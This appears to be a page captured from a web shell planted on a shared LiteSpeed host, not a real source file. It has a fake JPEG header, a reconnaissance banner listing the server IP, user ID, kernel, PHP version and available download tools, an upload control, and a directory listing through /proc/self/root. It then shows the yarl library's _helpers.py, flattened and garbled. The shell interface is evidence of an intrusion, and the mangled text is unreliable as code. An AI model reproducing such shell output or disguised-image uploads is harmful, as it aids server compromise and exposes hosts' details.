���� JFIF fdasasfas213sdaf
Server IP : 147.79.69.231 / Your IP : 216.73.216.222 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /proc/self/root/opt/alt/python311/lib64/python3.11/site-packages/yarl/ |
Upload File : |
import os import sys from typing import TYPE_CHECKING __all__ = ("cached_property",) NO_EXTENSIONS = bool(os.environ.get("YARL_NO_EXTENSIONS")) # type: bool if sys.implementation.name != "cpython": NO_EXTENSIONS = True # isort: off if TYPE_CHECKING: from ._helpers_py import cached_property as cached_property_py cached_property = cached_property_py elif not NO_EXTENSIONS: # pragma: no branch try: from ._helpers_c import cached_property as cached_property_c # type: ignore[attr-defined, unused-ignore] # noqa: E501 cached_property = cached_property_c except ImportError: # pragma: no cover from ._helpers_py import cached_property as cached_property_py cached_property = cached_property_py # type: ignore[assignment, misc] else: from ._helpers_py import cached_property as cached_property_py cached_property = cached_property_py # type: ignore[assignment, misc] # isort: on